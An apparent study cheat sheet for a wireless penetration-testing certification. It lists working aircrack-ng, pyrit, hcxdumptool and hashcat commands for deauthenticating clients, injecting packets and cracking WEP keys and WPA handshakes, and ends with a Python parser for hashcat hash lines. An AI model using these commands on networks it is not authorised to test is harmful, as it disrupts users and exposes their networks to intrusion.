Last changed: 15.03.2020
Hacking wireless networks
This command list served as a cheat sheet for the Offensive Security Wireless Professional exam and shows the usage of the most common attack tools.
preparation
show and stop interfering processes
systemctl stop NetworkManager
airmon-ng check [kill]
change MAC address
macchanger -m 00:11:22:33:44:55 wlan0
toggle monitor mode
airmon-ng start wlan0
airmon-ng stop wlan0mon
card to card injection test
With two wireless interfaces in monitor mode you can test which specific injection attacks are supported.
aireplay-ng -9 -i wlan1mon wlan0mon
prevent Network Manager from managing devices
If you want to keep your Network Manager running, you can blacklist the MAC addresses of the interfaces that shall be ignored.
/etc/NetworkManager/NetworkManager.conf
...
[keyfile]
unmanaged-devices=mac:00:11:22:33:44:55
...
traffic capture
capture traffic (2.4 and 5 GHz)
airodump-ng --band abg --manufacturer wlan0mon
show manufacturer information
airodump-ng-oui-update
airodump-ng --manufacturer wlan0mon
attacking wep
The major flaw of WEP encryption lies in the possibility of a statistical attack based on weak initialization vectors. So the standard procedure consists of dumping the traffic, forcing a lot of data packets, and cracking the capture file.
collect ivs
airodump-ng -c 1 -w wep_file --ivs wlan0mon
open system authentication
aireplay-ng -1 60 -a <AP_MAC> -h <source_MAC> wlan0mon
shared key authentication
aireplay-ng -1 60 -y <xor_file> -a <AP_MAC> -h <source_MAC> wlan0mon
arp replay attack
aireplay-ng -3 -b <AP_MAC> -h <source_MAC> wlan0mon
chopchop attack
aireplay-ng -4 -b <AP_MAC> -h <source_MAC> wlan0mon
fragmentation attack
aireplay-ng -5 -b <AP_MAC> -h <source_MAC> wlan0mon
create ARP packet
packetforge-ng -0 -a <AP_MAC> -h <source_MAC> -l 255.255.255.255 -k 255.255.255.255 -y <xor_file> -w arp.cap
inject packet
aireplay-ng -2 -r arp.cap wlan0mon
crack the wep key
aircrack-ng wep_file.ivs
attacking wpa
WPA-encrypted networks are regarded as secure, and the only known attack is to brute force the 4-way handshake or the PMKID.
capture handshake
airodump-ng -c 1 -w wpa_file wlan0mon
deauthenticate client
aireplay-ng -0 1 -a <AP_MAC> -c <client_MAC> wlan0mon
strip unneeded packets
pyrit -r wpa_file.cap -o wpa_file_strip.cap strip
wordlist attack
aircrack-ng -w wordlist.txt wpa_file_strip.cap
pyrit -i wordlist.txt -r wpa_file_strip.cap attack_passthrough
brute force attack
john --incremental --stdout | aircrack-ng -w - wpa_file_strip.cap
precomputed pmk attack
pyrit -i wordlist.txt import_passwords
pyrit -e <essid> create_essid
pyrit batch
pyrit -r wpa_file_strip.cap attack_db
speed up with qw
As when managing wireless networks from the command line, the script qw can be used to simplify sniffing and capturing of WPA handshakes.
capture handshake
qw s -c 1 -f wpa_file
qw d <bssid>
automatic handshake capture
The tool hcxdumptool automatically tries to retrieve WLAN handshakes from discovered networks and clients.
hcxdumptool -i wlan0 -o out.pcapng -c 1,6,11 --enable_status 1
To extract all needed data in a format compatible with hashcat you can use hcxpcapngtool from hcxtools.
hcxpcapngtool -o hashes *.pcapng
hashcat -m 22000 hashes some_wordlist.txt
If you want to crack only unique handshakes you can filter your file with awk.
grep 'WPA\*02\*' hashes | sort -t\* -k 4 | awk -F \* 'BEGIN{last=0}{ if (last != $4) { print; last=$4} }' > filtered_hashes
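The hashcat mode-22000 lines that the awk pipeline above filters have a fixed `*`-separated layout (WPA, type, MIC or PMKID, AP MAC, station MAC, hex ESSID, nonce, EAPOL, message pair). As an added example that is not part of the original cheat sheet, the Python script below parses such lines, keeps one EAPOL entry per access point exactly as the awk command does, and additionally reports per ESSID whether PMKID or 4-way-handshake material is present, which is handy when auditing what a capture of your own networks exposed. The three input lines are constructed placeholders, not data from a real capture.

```python
"""Parse hashcat mode-22000 lines and de-duplicate them per access point.

Field layout (separated by '*'):
  WPA*TYPE*PMKID_OR_MIC*MAC_AP*MAC_STA*ESSID_HEX*ANONCE*EAPOL*MESSAGEPAIR
TYPE is 01 for a PMKID entry and 02 for a 4-way handshake (EAPOL) entry.
"""
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class Hash22000:
    kind: str      # "01" (PMKID) or "02" (EAPOL)
    mac_ap: str    # 12 hex digits, no separators
    mac_sta: str
    essid: str     # decoded from the hex field
    raw: str       # original line, kept for writing back out

def parse_line(line: str) -> Hash22000:
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] not in ("01", "02"):
        raise ValueError(f"not a mode-22000 line: {line!r}")
    essid = bytes.fromhex(fields[5]).decode("utf-8", errors="replace")
    return Hash22000(fields[1], fields[3].lower(), fields[4].lower(), essid, line.strip())

def dedupe_per_ap(lines: List[str], kind: str = "02") -> List[str]:
    """Keep the first entry of the requested TYPE for every AP MAC.
    kind="02" reproduces: grep 'WPA*02*' | sort | awk (one line per $4)."""
    seen, kept = set(), []
    for rec in map(parse_line, lines):
        if rec.kind == kind and rec.mac_ap not in seen:
            seen.add(rec.mac_ap)
            kept.append(rec.raw)
    return kept

def summarize(lines: List[str]) -> Dict[str, Dict[str, int]]:
    """Count PMKID and EAPOL entries per ESSID: which networks in the capture
    yielded crackable material, and of what kind."""
    summary: Dict[str, Dict[str, int]] = {}
    for rec in map(parse_line, lines):
        per_essid = summary.setdefault(rec.essid, {"pmkid": 0, "eapol": 0})
        per_essid["pmkid" if rec.kind == "01" else "eapol"] += 1
    return summary

# Constructed sample lines (not from a real capture); the hex fields are
# placeholders of the right length, not genuine MICs, PMKIDs or EAPOL frames.
SAMPLE_LINES = [
    "WPA*02*" + "11" * 16 + "*aabbccddeeff*001122334455*" + "homenet".encode().hex()
    + "*" + "22" * 32 + "*" + "33" * 20 + "*02",
    "WPA*02*" + "44" * 16 + "*aabbccddeeff*001122334466*" + "homenet".encode().hex()
    + "*" + "55" * 32 + "*" + "66" * 20 + "*00",
    "WPA*01*" + "77" * 16 + "*a1b2c3d4e5f6*001122334477*" + "guest".encode().hex() + "***",
]
```

Running `dedupe_per_ap(SAMPLE_LINES)` on the sample keeps only the first homenet line, since both EAPOL entries belong to the same AP MAC and the guest entry is a PMKID.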